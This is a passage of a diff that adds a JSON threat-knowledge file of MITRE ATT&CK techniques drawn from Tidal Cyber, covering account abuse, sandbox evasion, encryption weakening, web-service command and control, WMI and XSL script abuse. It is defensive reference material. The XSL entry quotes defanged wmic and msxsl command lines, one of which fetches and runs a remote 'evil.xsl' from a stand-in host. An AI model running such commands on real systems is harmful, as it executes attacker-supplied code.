mechanisms to leverage permissions outside the intended scope of the account. Such over privileged accounts may be used to harvest sensitive data from online storage accounts and databases through [Cloud API](https://app.tidalcyber.com/technique/af798e80-2cc5-5452-83e4-9560f08bf2d5) or other methods. \n", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1078.004" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + }, + { + "dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c", + "type": "uses" + } + ], + "uuid": "3c4a2f3a-5877-4a27-a417-76318523657e", + "value": "Cloud Accounts" + }, + { + "description": "Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.[[Microsoft Local Accounts Feb 2019](https://app.tidalcyber.com/references/6ae7487c-cb61-4f10-825f-4ef9ef050b7c)][[AWS Root User](https://app.tidalcyber.com/references/5f315c21-f02f-4c9e-aac6-d648deff3ff9)][[Threat Matrix for Kubernetes](https://app.tidalcyber.com/references/43fab719-e348-4902-8df3-8807765b95f0)]\n\nDefault accounts are not limited to client machines, rather also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://app.tidalcyber.com/technique/e493bf4a-0eba-4e60-a7a6-c699084dc98a) or credential materials to legitimately connect to remote environments via [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1).[[Metasploit SSH Module](https://app.tidalcyber.com/references/e4ae69e5-67ba-4a3e-8101-5e7f073bd312)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1078.001" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + }, + { + "dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c", + "type": "uses" + } + ], + "uuid": "6c55cf9c-0259-4ba0-9574-e90f6c88e6fd", + "value": "Default Accounts" + }, + { + "description": "Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.[[TechNet Credential Theft](https://app.tidalcyber.com/references/5c183c97-0ab2-4b75-8dbc-9db92a929ff4)] Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.[[Microsoft AD Accounts](https://app.tidalcyber.com/references/df734659-2441-487a-991d-59064c61b771)]\n\nAdversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d) or password reuse, allowing access to privileged resources of the domain.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1078.002" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + }, + { + "dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c", + "type": "uses" + } + ], + "uuid": "74b99029-3f0a-4cc8-90d6-5a6b177c06eb", + "value": "Domain Accounts" + }, + { + "description": "Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.\n\nLocal Accounts may also be abused to elevate privileges and harvest credentials through [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d). Password reuse may allow the abuse of local accounts across a set of machines on a network for the purposes of Privilege Escalation and Lateral Movement. ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1078.003" + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + }, + { + "dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c", + "type": "uses" + } + ], + "uuid": "d2a19fd8-ff9c-4f9e-9e84-ed3ea12c4b7c", + "value": "Local Accounts" + }, + { + "description": "Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.[[volexity_0day_sophos_FW](https://app.tidalcyber.com/references/85bee18e-216d-4ea6-b34e-b071e3f63382)] Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.\n\nIn some cases, adversaries may abuse inactive accounts: for example, those belonging to individuals who are no longer part of an organization. Using these accounts may allow the adversary to evade detection, as the original account user will not be present to identify any anomalous activity taking place on their account.[[CISA MFA PrintNightmare](https://app.tidalcyber.com/references/fa03324e-c79c-422e-80f1-c270fd87d4e2)]\n\nThe overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise.[[TechNet Credential Theft](https://app.tidalcyber.com/references/5c183c97-0ab2-4b75-8dbc-9db92a929ff4)]", + "meta": { + "platforms": [ + "Azure AD", + "Containers", + "Google Workspace", + "IaaS", + "Linux", + "macOS", + "Network", + "Office 365", + "SaaS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "ec4f9786-c00c-430a-bc6d-0d0d22fdd393", + "type": "uses" + }, + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + }, + { + "dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c", + "type": "uses" + }, + { + "dest-uuid": "3c4a2f3a-5877-4a27-a417-76318523657e", + "type": "similar" + }, + { + "dest-uuid": "6c55cf9c-0259-4ba0-9574-e90f6c88e6fd", + "type": "similar" + }, + { + "dest-uuid": "74b99029-3f0a-4cc8-90d6-5a6b177c06eb", + "type": "similar" + }, + { + "dest-uuid": "d2a19fd8-ff9c-4f9e-9e84-ed3ea12c4b7c", + "type": "similar" + } + ], + "uuid": "a9b7eb2f-63e7-41bc-9d77-f7c4cede5406", + "value": "Valid Accounts" + }, + { + "description": "An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.\n\nMalware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be written to disk and exfiltrated later. This technique differs from [Screen Capture](https://app.tidalcyber.com/technique/4462ce9d-0a5a-427d-8160-7b307b50cfbd) due to use of specific devices or applications for video recording rather than capturing the victim's screen.\n\nIn macOS, there are a few different malware samples that record the user's webcam such as FruitFly and Proton. [[objective-see 2017 review](https://app.tidalcyber.com/references/26b757c8-25cd-42ef-bef2-eb7a28455d57)]", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a", + "type": "uses" + } + ], + "uuid": "0c81e13a-3608-4171-8075-9f70b2934028", + "value": "Video Capture" + }, + { + "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8) during automated discovery to shape follow-on behaviors.[[Deloitte Environment Awareness](https://app.tidalcyber.com/references/af842a1f-8f39-4b4f-b4d2-0bbb810e6c31)]\n\nSpecific checks will vary based on the target and/or adversary, but may involve behaviors such as [Windows Management Instrumentation](https://app.tidalcyber.com/technique/c37795d9-8970-461f-9491-3086d6b4b69a), [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde), [System Information Discovery](https://app.tidalcyber.com/technique/a2961a00-450e-45a5-b293-f699d9f3b4ea), and [Query Registry](https://app.tidalcyber.com/technique/58722f84-b119-45a8-8e29-0065688015ee) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks into one script and then have the program exit if it determines the system to be a virtual environment. \n\nChecks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size. \n\nOther common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.[[McAfee Virtual Jan 2017](https://app.tidalcyber.com/references/a541a027-733c-438f-a723-6f7e8e6f354c)] In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output. \n \nHardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.[[Unit 42 OilRig Sept 2018](https://app.tidalcyber.com/references/84815940-b98a-4f5c-82fe-7d8bf2f51a09)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1497.001" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + }, + { + "dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa", + "type": "uses" + } + ], + "uuid": "026c9281-07f1-4358-96d3-151fed76b1fe", + "value": "System Checks" + }, + { + "description": "Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.\n\nAdversaries may employ various time-based evasions, such as delaying malware functionality upon initial execution using programmatic sleep commands or native system scheduling functionality (ex: [Scheduled Task/Job](https://app.tidalcyber.com/technique/0baf02af-ffaa-403f-9f0d-da51f463a1d8)). Delays may also be based on waiting for specific victim conditions to be met (ex: system time, events, etc.) or employ scheduled [Multi-Stage Channels](https://app.tidalcyber.com/technique/e54bdb49-6039-4048-9be6-657a7ff3e071) to avoid analysis and scrutiny.[[Deloitte Environment Awareness](https://app.tidalcyber.com/references/af842a1f-8f39-4b4f-b4d2-0bbb810e6c31)]\n\nBenign commands or other operations may also be used to delay malware execution. Loops or otherwise needless repetitions of commands, such as [Ping](https://app.tidalcyber.com/software/4ea12106-c0a1-4546-bb64-a1675d9f5dc7)s, may be used to delay malware execution and potentially exceed time thresholds of automated analysis environments.[[Revil Independence Day](https://app.tidalcyber.com/references/d7c4f03e-7dc0-4196-866b-c1a8eb943f77)][[Netskope Nitol](https://app.tidalcyber.com/references/94b5ac75-1fd5-4cad-a604-2b09846eb975)] Another variation, commonly referred to as API hammering, involves making various calls to [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) functions in order to delay execution (while also potentially overloading analysis environments with junk data).[[Joe Sec Nymaim](https://app.tidalcyber.com/references/fe6ac288-1c7c-4ec0-a709-c3ca56e5d088)][[Joe Sec Trickbot](https://app.tidalcyber.com/references/f5441718-3c0d-4b26-863c-24df1130b090)]\n\nAdversaries may also use time as a metric to detect sandboxes and analysis environments, particularly those that attempt to manipulate time mechanisms to simulate longer elapses of time. For example, an adversary may be able to identify a sandbox accelerating time by sampling and calculating the expected value for an environment's timestamp before and after execution of a sleep function.[[ISACA Malware Tricks](https://app.tidalcyber.com/references/a071bf02-066b-46e6-a554-f43d0c170807)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1497.003" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + }, + { + "dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa", + "type": "uses" + } + ], + "uuid": "0ca01a9e-571e-4b17-a84d-23e9ce39b073", + "value": "Time Based Evasion" + }, + { + "description": "Adversaries may employ various user activity checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8) during automated discovery to shape follow-on behaviors.[[Deloitte Environment Awareness](https://app.tidalcyber.com/references/af842a1f-8f39-4b4f-b4d2-0bbb810e6c31)]\n\nAdversaries may search for user activity on the host based on variables such as the speed/frequency of mouse movements and clicks [[Sans Virtual Jan 2016](https://app.tidalcyber.com/references/5d3d567c-dc25-44c1-8d2a-71ae00b60dbe)] , browser history, cache, bookmarks, or number of files in common directories such as home or the desktop. Other methods may rely on specific user interaction with the system before the malicious code is activated, such as waiting for a document to close before activating a macro [[Unit 42 Sofacy Nov 2018](https://app.tidalcyber.com/references/1523c6de-8879-4652-ac51-1a5085324370)] or waiting for a user to double click on an embedded image to activate.[[FireEye FIN7 April 2017](https://app.tidalcyber.com/references/6ee27fdb-1753-4fdf-af72-3295b072ff10)] ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1497.002" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + }, + { + "dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa", + "type": "uses" + } + ], + "uuid": "cb268bcf-3c2f-4583-94e3-7c9f0893e52f", + "value": "User Activity Based Checks" + }, + { + "description": "Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8) during automated discovery to shape follow-on behaviors.[[Deloitte Environment Awareness](https://app.tidalcyber.com/references/af842a1f-8f39-4b4f-b4d2-0bbb810e6c31)]\n\nAdversaries may use several methods to accomplish [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8) such as checking for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) or other system artifacts associated with analysis or virtualization. Adversaries may also check for legitimate user activity to help determine if it is in an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandbox.[[Unit 42 Pirpi July 2015](https://app.tidalcyber.com/references/42d35b93-2866-46d8-b8ff-675df05db9db)]\n\n", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + }, + { + "dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa", + "type": "uses" + }, + { + "dest-uuid": "026c9281-07f1-4358-96d3-151fed76b1fe", + "type": "similar" + }, + { + "dest-uuid": "0ca01a9e-571e-4b17-a84d-23e9ce39b073", + "type": "similar" + }, + { + "dest-uuid": "cb268bcf-3c2f-4583-94e3-7c9f0893e52f", + "type": "similar" + } + ], + "uuid": "63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8", + "value": "Virtualization/Sandbox Evasion" + }, + { + "description": "Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.\n\nMany network devices such as routers, switches, and firewalls, perform encryption on network traffic to secure transmission across networks. Often, these devices are equipped with special, dedicated encryption hardware to greatly increase the speed of the encryption process as well as to prevent malicious tampering. When an adversary takes control of such a device, they may disable the dedicated hardware, for example, through use of [Modify System Image](https://app.tidalcyber.com/technique/f435a5ff-78d2-44de-b464-2b5528f94adc), forcing the use of software to perform encryption on general processors. This is typically used in conjunction with attacks to weaken the strength of the cipher in software (e.g., [Reduce Key Space](https://app.tidalcyber.com/technique/aa6595d5-1b2e-45a8-8caf-b0968aeab2ba)). [[Cisco Blog Legacy Device Attacks](https://app.tidalcyber.com/references/f7ce5099-7e04-4c0b-8767-e0eec664b18e)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1600.002" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "f413afa2-406d-4e8e-a12c-5f1b8ef05d8a", + "value": "Disable Crypto Hardware" + }, + { + "description": "Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.[[Cisco Synful Knock Evolution](https://app.tidalcyber.com/references/29301297-8343-4f75-8096-7fe229812f75)]\n\nAdversaries can weaken the encryption software on a compromised network device by reducing the key size used by the software to convert plaintext to ciphertext (e.g., from hundreds or thousands of bytes to just a couple of bytes). As a result, adversaries dramatically reduce the amount of effort needed to decrypt the protected information without the key.\n\nAdversaries may modify the key size used and other encryption parameters using specialized commands in a [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) introduced to the system through [Modify System Image](https://app.tidalcyber.com/technique/f435a5ff-78d2-44de-b464-2b5528f94adc) to change the configuration of the device. [[Cisco Blog Legacy Device Attacks](https://app.tidalcyber.com/references/f7ce5099-7e04-4c0b-8767-e0eec664b18e)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1600.001" + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "aa6595d5-1b2e-45a8-8caf-b0968aeab2ba", + "value": "Reduce Key Space" + }, + { + "description": "Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. [[Cisco Synful Knock Evolution](https://app.tidalcyber.com/references/29301297-8343-4f75-8096-7fe229812f75)]\n\nEncryption can be used to protect transmitted network traffic to maintain its confidentiality (protect against unauthorized disclosure) and integrity (protect against unauthorized changes). Encryption ciphers are used to convert a plaintext message to ciphertext and can be computationally intensive to decipher without the associated decryption key. Typically, longer keys increase the cost of cryptanalysis, or decryption without the key.\n\nAdversaries can compromise and manipulate devices that perform encryption of network traffic. For example, through behaviors such as [Modify System Image](https://app.tidalcyber.com/technique/f435a5ff-78d2-44de-b464-2b5528f94adc), [Reduce Key Space](https://app.tidalcyber.com/technique/aa6595d5-1b2e-45a8-8caf-b0968aeab2ba), and [Disable Crypto Hardware](https://app.tidalcyber.com/technique/f413afa2-406d-4e8e-a12c-5f1b8ef05d8a), an adversary can negatively effect and/or eliminate a device’s ability to securely encrypt network traffic. This poses a greater risk of unauthorized disclosure and may help facilitate data manipulation, Credential Access, or Collection efforts. [[Cisco Blog Legacy Device Attacks](https://app.tidalcyber.com/references/f7ce5099-7e04-4c0b-8767-e0eec664b18e)]", + "meta": { + "platforms": [ + "Network" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + }, + { + "dest-uuid": "f413afa2-406d-4e8e-a12c-5f1b8ef05d8a", + "type": "similar" + }, + { + "dest-uuid": "aa6595d5-1b2e-45a8-8caf-b0968aeab2ba", + "type": "similar" + } + ], + "uuid": "8cf19b3d-c9fa-4d71-a6ab-dc0e236e57d4", + "value": "Weaken Encryption" + }, + { + "description": "Adversaries may use an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems can then send the output from those commands back over that Web service channel. The return traffic may occur in a variety of ways, depending on the Web service being utilized. For example, the return traffic may take the form of the compromised system posting a comment on a forum, issuing a pull request to development project, updating a document hosted on a Web service, or by sending a Tweet. \n\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection. ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1102.002" + }, + "related": [ + { + "dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb", + "type": "uses" + } + ], + "uuid": "f8a4c7ee-074b-4bfc-95be-43d91756b73c", + "value": "Bidirectional Communication" + }, + { + "description": "Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.\n\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.\n\nUse of a dead drop resolver may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1102.001" + }, + "related": [ + { + "dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb", + "type": "uses" + } + ], + "uuid": "faeec22d-dff4-496f-9c7e-14c4f2c8d054", + "value": "Dead Drop Resolver" + }, + { + "description": "Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.\n\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1102.003" + }, + "related": [ + { + "dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb", + "type": "uses" + } + ], + "uuid": "9ff640ed-572e-4adc-bdc6-234a9e8ef36b", + "value": "One-Way Communication" + }, + { + "description": "Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.\n\nUse of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb", + "type": "uses" + }, + { + "dest-uuid": "f8a4c7ee-074b-4bfc-95be-43d91756b73c", + "type": "similar" + }, + { + "dest-uuid": "faeec22d-dff4-496f-9c7e-14c4f2c8d054", + "type": "similar" + }, + { + "dest-uuid": "9ff640ed-572e-4adc-bdc6-234a9e8ef36b", + "type": "similar" + } + ], + "uuid": "a729feee-8e21-444e-8eea-2ec595b09931", + "value": "Web Service" + }, + { + "description": "Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1) such as [Distributed Component Object Model](https://app.tidalcyber.com/technique/ebc5fabb-5634-49f2-8979-94ea98da114a) (DCOM) and [Windows Remote Management](https://app.tidalcyber.com/technique/c2866fd3-754e-4b40-897a-e73a8c1fcf7b) (WinRM).[[MSDN WMI](https://app.tidalcyber.com/references/210ca539-71f6-4494-91ea-402a3e0e2a10)] Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.[[MSDN WMI](https://app.tidalcyber.com/references/210ca539-71f6-4494-91ea-402a3e0e2a10)][[FireEye WMI 2015](https://app.tidalcyber.com/references/135ccd72-2714-4453-9c8f-f5fde31905ee)]\n\nAn adversary can use WMI to interact with local and remote systems and use it as a means to execute various behaviors, such as gathering information for Discovery as well as remote Execution of files as part of Lateral Movement. [[FireEye WMI SANS 2015](https://app.tidalcyber.com/references/a9333ef5-5637-4a4c-9aaf-fdc9daf8b860)] [[FireEye WMI 2015](https://app.tidalcyber.com/references/135ccd72-2714-4453-9c8f-f5fde31905ee)]", + "meta": { + "platforms": [ + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44", + "type": "uses" + } + ], + "uuid": "c37795d9-8970-461f-9491-3086d6b4b69a", + "value": "Windows Management Instrumentation" + }, + { + "description": "Adversaries may bypass application control and obscure execution of code by embedding scripts inside XSL files. Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. To support complex operations, the XSL standard includes support for embedded scripting in various languages. [[Microsoft XSLT Script Mar 2017](https://app.tidalcyber.com/references/7ff47640-2a98-4a55-939a-ab6c8c8d2d09)]\n\nAdversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to [Trusted Developer Utilities Proxy Execution](https://app.tidalcyber.com/technique/8811114c-a0cf-479c-b95d-c036467749e3), the Microsoft common line transformation utility binary (msxsl.exe) [[Microsoft msxsl.exe](https://app.tidalcyber.com/references/a25d664c-d109-466f-9b6a-7e9ea8c57895)] can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. [[Penetration Testing Lab MSXSL July 2017](https://app.tidalcyber.com/references/2f1adf20-a4b8-48c1-861f-0a44271765d7)] Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. [[Reaqta MSXSL Spearphishing MAR 2018](https://app.tidalcyber.com/references/927737c9-63a3-49a6-85dc-620e055aaf0a)] Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.[[XSL Bypass Mar 2019](https://app.tidalcyber.com/references/e4e2cf48-47e0-45d8-afc2-a35635f7e880)]\n\nCommand-line examples:[[Penetration Testing Lab MSXSL July 2017](https://app.tidalcyber.com/references/2f1adf20-a4b8-48c1-861f-0a44271765d7)][[XSL Bypass Mar 2019](https://app.tidalcyber.com/references/e4e2cf48-47e0-45d8-afc2-a35635f7e880)]\n\n* msxsl.exe customers[.]xml script[.]xsl\n* msxsl.exe script[.]xsl script[.]xsl\n* msxsl.exe script[.]jpeg script[.]jpeg\n\nAnother variation of this technique, dubbed “Squiblytwo”, involves using [Windows Management Instrumentation](https://app.tidalcyber.com/technique/c37795d9-8970-461f-9491-3086d6b4b69a) to invoke JScript or VBScript within an XSL file.[[LOLBAS Wmic](https://app.tidalcyber.com/references/497e73d4-9f27-4b30-ba09-f152ce866d0f)] This technique can also execute local/remote scripts and, similar to its [Regsvr32](https://app.tidalcyber.com/technique/b1da2b02-9ade-45e0-a795-ec1b19e5316a)/ \"Squiblydoo\" counterpart, leverages a trusted, built-in Windows tool. Adversaries may abuse any alias in [Windows Management Instrumentation](https://app.tidalcyber.com/technique/c37795d9-8970-461f-9491-3086d6b4b69a) provided they utilize the /FORMAT switch.[[XSL Bypass Mar 2019](https://app.tidalcyber.com/references/e4e2cf48-47e0-45d8-afc2-a35635f7e880)]\n\nCommand-line examples:[[XSL Bypass Mar 2019](https://app.tidalcyber.com/references/e4e2cf48-47e0-45d8-afc2-a35635f7e880)][[LOLBAS Wmic](https://app.tidalcyber.com/references/497e73d4-9f27-4b30-ba09-f152ce866d0f)]\n\n* Local File: wmic process list /FORMAT:evil[.]xsl\n* Remote File: wmic os get /FORMAT:”https[:]//example[.]com/evil[.]xsl”", + "meta": { + "platforms": [ + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "4eb755e6-41f1-4c92-b14d-87a61a446258", + "value": "XSL Script Processing" + } + ] +} diff --git a/galaxies/tidal-campaigns.json b/galaxies/tidal-campaigns.json new file mode 100644 index 0000000..702e518 --- /dev/null +++ b/galaxies/tidal-campaigns.json @@ -0,0 +1,9 @@ +{ + "description": "Tidal Campaigns Galaxy", + 